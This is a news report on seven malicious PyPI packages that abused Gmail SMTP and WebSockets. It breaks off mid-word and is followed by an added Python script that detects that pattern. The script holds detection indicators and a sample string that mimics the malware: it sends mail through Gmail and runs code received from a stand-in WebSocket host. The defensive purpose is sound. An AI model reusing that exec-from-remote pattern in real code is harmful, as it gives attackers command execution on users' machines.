Malicious PyPI packages abuse Gmail, websockets to hijack systems
Published on: 2025-07-30 16:25:36
Seven malicious PyPI packages were found using Gmail's SMTP servers and WebSockets for data exfiltration and remote command execution.
The packages were discovered by Socket's threat research team, who reported their findings to PyPI, resulting in the removal of the packages.
However, some of these packages were on PyPI for over four years, and based on third-party download counters, one was downloaded over 18,000 times.
Here's the complete list shared by Socket:
Coffin-Codes-Pro (9,000 downloads)
Coffin-Codes-NET2 (6,200 downloads)
Coffin-Codes-NET (6,100 downloads)
Coffin-Codes-2022 (18,100 downloads)
Coffin2022 (6,500 downloads)
Coffin-Grave (6,500 downloads)
cfc-bsb (2,900 downloads)
The 'Coffin' packages appear to be impersonating the legitimate Coffin package that serves as a lightweight adapter for integrating Jinja2 templates into Django projects.
The malicious functionality Socket discovered in these packages centers on covert remote access and data exfiltratio
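As a defensive illustration of the pattern described above (SMTP pointed at Gmail combined with a WebSocket client and dynamic code execution), the following static triage script walks a package's Python sources and counts how many of those building blocks co-occur in one file. It is an added example, not Socket's or the article's code; the indicator lists, the scoring rule, and the sample snippets are constructed assumptions for this page.

```python
"""Triage helper: flag Python sources that combine Gmail SMTP, WebSocket and
dynamic-execution indicators. Added example; thresholds are assumptions."""
import ast
import pathlib

# Assumed indicator set: modules and hostnames worth flagging when they co-occur.
SUSPICIOUS_MODULES = {"smtplib": "smtp", "websocket": "websocket", "websockets": "websocket"}
SUSPICIOUS_HOSTS = {"smtp.gmail.com"}


def scan_source(src: str) -> dict:
    """Return which indicator categories a Python source text contains."""
    found = {"smtp": False, "websocket": False, "gmail_host": False, "exec": False}
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                cat = SUSPICIOUS_MODULES.get(alias.name.split(".")[0])
                if cat:
                    found[cat] = True
        elif isinstance(node, ast.ImportFrom) and node.module:
            cat = SUSPICIOUS_MODULES.get(node.module.split(".")[0])
            if cat:
                found[cat] = True
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.lower() in SUSPICIOUS_HOSTS:
                found["gmail_host"] = True
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in {"exec", "eval"}:
                found["exec"] = True
    return found


def risk_score(found: dict) -> int:
    """Number of independent indicator categories present; 3+ deserves manual review."""
    return sum(found.values())


def scan_package_dir(path) -> dict:
    """Score every .py file under a directory; -1 marks files ast cannot parse."""
    results = {}
    for py in pathlib.Path(path).rglob("*.py"):
        try:
            results[str(py)] = risk_score(scan_source(py.read_text(errors="replace")))
        except SyntaxError:
            results[str(py)] = -1  # obfuscated or non-Python content: review by hand
    return results


# Constructed samples (not real package code) mimicking the reported pattern.
SUSPICIOUS_SAMPLE = (
    "import smtplib, os\nfrom websocket import create_connection\n"
    's = smtplib.SMTP_SSL("smtp.gmail.com", 465)\n'
    'ws = create_connection("wss://example.invalid/")\nexec(ws.recv())\n'
)
BENIGN_SAMPLE = "import json\nprint(json.dumps({'ok': True}))\n"
```

Run `scan_package_dir` against an unpacked sdist or a site-packages directory and review any file scoring 3 or higher; a lone `smtplib` import is normal and scores only 1.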